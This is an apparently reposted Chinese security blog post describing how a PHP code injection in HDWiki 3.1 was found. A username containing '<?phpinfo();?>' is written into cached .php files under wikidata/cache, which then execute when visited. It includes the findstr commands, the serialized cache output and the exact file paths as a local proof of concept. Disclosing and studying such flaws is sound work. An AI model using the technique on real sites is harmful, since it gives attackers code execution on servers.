| 金金 |
2009-02-09 15:01 |
By q1ur3n
http://www.wolvez.org/
2008-11-14
说说过程吧,当然这样的洞是很低级的,纯属给大家娱乐。:)
安装好hdwiki后我注册了一个名为testtest的用户,然后cmd下cd到hdwiki的目录,执行
findstr /s /i /n "testtest" *.php
结果如下:
wikidata\cache\cache_index_chartsuser.php:1:a:2:{i:0;a:5:{s:7:"user_id";s:1:"2";
s:9:"user_nick";s:4:"root";s:10:"user_click";s:1:"0";s:13:"user_nick_alt";s:4:"r
oot";s:15:"user_rewriteurl";s:18:"space.php?userid=2";}i:1;a:5:{s:7:"user_id";s:
2:"14";s:9:"user_nick";s:8:"testtest";s:10:"user_click";s:1:"0";s:13:"user_nick_
alt";s:8:"testtest";s:15:"user_rewriteurl";s:19:"space.php?userid=14";}}
wikidata\cache\cache_index_activeuser.php:1:a:2:{i:0;a:5:{s:7:"user_id";s:1:"2";s:9:"use
r_nick";s:4:"root";s:14:"user_small_ico";s:0:"";s:13:"user_nick_alt";s:4:"root";
s:15:"user_rewriteurl";s:18:"space.php?userid=2";}i:1;a:5:{s:7:"user_id";s:2:"14
";s:9:"user_nick";s:4:"tes.";s:14:"user_small_ico";s:0:"";s:13:"user_nick_alt";s
:8:"testtest";s:15:"user_rewriteurl";s:19:"space.php?userid=14";}}
wikidata\cache\cache_index_latestuser.php:1:a:2:{i:0;a:5:{s:7:"user_id";s:2:"14";s:9:"user_nic
k";s:4:"tes.";s:14:"user_small_ico";s:0:"";s:13:"user_nick_alt";s:8:"testtest";s
:15:"user_rewriteurl";s:19:"space.php?userid=14";}i:1;a:5:{s:7:"user_id";s:1:"2"
;s:9:"user_nick";s:4:"root";s:14:"user_small_ico";s:0:"";s:13:"user_nick_alt";s:
4:"root";s:15:"user_rewriteurl";s:18:"space.php?userid=2";}}
可以看到testtest被写入了这三个php文件里了,并且这三个php缓存文件可以正常执行,
于是我接着注册了一个名为q1ur3n<?phpinfo();?>的用户,再退出登陆了一次,
cmd下执行findstr /s /i /n "q1ur3n<?phpinfo();?>" *.php
结果如下
wikidata\cache\cache_index_chartsuser.php:1:a:3:{i:0;a:5:{s:7:"user_id";s:1:"2";
s:9:"user_nick";s:4:"root";s:10:"user_click";s:1:"0";s:13:"user_nick_alt";s:4:"r
oot";s:15:"user_rewriteurl";s:18:"space.php?userid=2";}i:1;a:5:{s:7:"user_id";s:
2:"14";s:9:"user_nick";s:8:"testtest";s:10:"user_click";s:1:"0";s:13:"user_nick_
alt";s:8:"testtest";s:15:"user_rewriteurl";s:19:"space.php?userid=14";}i:2;a:5:{
s:7:"user_id";s:2:"15";s:9:"user_nick";s:6:"q1ur3.";s:10:"user_click";s:1:"0";s:
13:"user_nick_alt";s:20:"q1ur3n<?phpinfo();?>";s:15:"user_rewriteurl";s:19:"spac
e.php?userid=15";}}
wikidata\cache\cache_index_activeuser.php:1:a:3:{i:0;a:5:{s:7:"user_id";s:1:"2";s:9:"user_nick";s:4:"root";s:14:"user_small_ico";s:0:"";s:13:
"user_nick_alt";s:4:"root";s:15:"user_rewriteurl";s:18:"space.php?userid=2";}i:1
;a:5:{s:7:"user_id";s:2:"14";s:9:"user_nick";s:4:"tes.";s:14:"user_small_ico";s:
0:"";s:13:"user_nick_alt";s:8:"testtest";s:15:"user_rewriteurl";s:19:"space.php?
userid=14";}i:2;a:5:{s:7:"user_id";s:2:"15";s:9:"user_nick";s:4:"q1u.";s:14:"use
r_small_ico";s:0:"";s:13:"user_nick_alt";s:20:"q1ur3n<?phpinfo();?>";s:15:"user_
rewriteurl";s:19:"space.php?userid=15";}}
wikidata\cache\cache_index_latestuser.php:1:a:3:{i:0;a:5:{s:7:"user_id";s:2:"15";s:9:"user_nick";s:4:"q1u.";s:14:"user_
small_ico";s:0:"";s:13:"user_nick_alt";s:20:"q1ur3n<?phpinfo();?>";s:15:"user_re
writeurl";s:19:"space.php?userid=15";}i:1;a:5:{s:7:"user_id";s:2:"14";s:9:"user_
nick";s:4:"tes.";s:14:"user_small_ico";s:0:"";s:13:"user_nick_alt";s:8:"testtest
";s:15:"user_rewriteurl";s:19:"space.php?userid=14";}i:2;a:5:{s:7:"user_id";s:1:
"2";s:9:"user_nick";s:4:"root";s:14:"user_small_ico";s:0:"";s:13:"user_nick_alt"
;s:4:"root";s:15:"user_rewriteurl";s:18:"space.php?userid=2";}}
访问
http://localhost/hdwiki/wikidata/cache/cache_index_chartsuser.php
http://localhost/hdwiki/wikidata/cache/cache_index_latestuser.php
http://localhost/hdwiki/wikidata/cache/cache_index_activeuser.php
可爱的phpinfo出来了.:)
当然能碰到这样的漏洞也真的需要人品好才行(我当时有去买彩票的冲动),
不过作为php漏洞的fuzz这个应该算是很典型的。
哦,hdwiki的版本是3.1的,比较老。 |
|